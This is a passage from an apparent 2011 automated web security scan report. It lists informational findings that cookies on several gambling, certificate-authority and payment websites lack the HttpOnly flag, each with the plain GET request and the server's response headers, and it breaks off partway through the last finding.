Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47045


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.357. http://www.svenskalotter.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.358. http://www.svenskalotter.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.359. http://www.svenskalotter.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.360. http://www.svenskalotter.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.361. http://www.svenskalotter.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.362. http://www.svenskalotter.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.363. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /click/Svenskalotter.com/SWE/Home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/Svenskalotter.com/SWE/Home/ HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34601


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.364. http://www.thawte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thawte.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:24:06 GMT
Server: Apache
Set-Cookie: v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Set-Cookie: v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 39346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

12.365. https://www.thawte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thawte.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:53 GMT
Server: Apache
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 39378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

12.366. http://www.verisign.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:15 GMT
Server: Apache
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29123

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...

12.367. http://www.visa.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visa.co.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.visa.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=u4ugzq45nptk4bikc3bma4mu; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: bbawtpcn=136cb2b4-a76c-43e4-8ee6-1a70f7ccba22; expires=Tue, 15-May-2012 12:45:16 GMT; path=/
X-FRAME-OPTIONS: SAMEORIGIN
Date: Mon, 16 May 2011 12:45:15 GMT
Content-Length: 127

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fen.aspx">here</a>.</h2>
</body></html>

12.368. http://www.winnings.com/comments/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /comments/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comments/feed HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 16 May 2011 12:35:39 GMT
ETag: "99b889a9cd748e8b4eca0eb3758d138d",""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:37 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:37 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:38 GMT
Connection: close
Content-Length: 846

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

12.369. http://www.winnings.com/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 08 Dec 2010 17:36:53 GMT
ETag: "b598834d1cd11660685dd3d70e23d7d7",""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:10 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:10 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:12 GMT
Connection: close
Content-Length: 25900

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

12.370. http://www.winnings.com/how-to-win-money

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /how-to-win-money

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /how-to-win-money HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:29 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:29 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:32 GMT
Connection: close
Content-Length: 22260

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>Cash Prizes - Learn how to make money online | H
...[SNIP]...

12.371. http://www.winnings.com/instant-games

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /instant-games

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instant-games HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:11 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:11 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:13 GMT
Connection: close
Content-Length: 24524

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Money Games Online ... Instant Win Games - Win Real Money..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...

12.372. http://www.winnings.com/lottery-scratch-cards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /lottery-scratch-cards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lottery-scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:35 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:35 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:36 GMT
Connection: close
Content-Length: 22417

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>Lottery scratch cards - Lottery Scratchcards Gam
...[SNIP]...

12.373. http://www.winnings.com/scratch-cards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /scratch-cards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
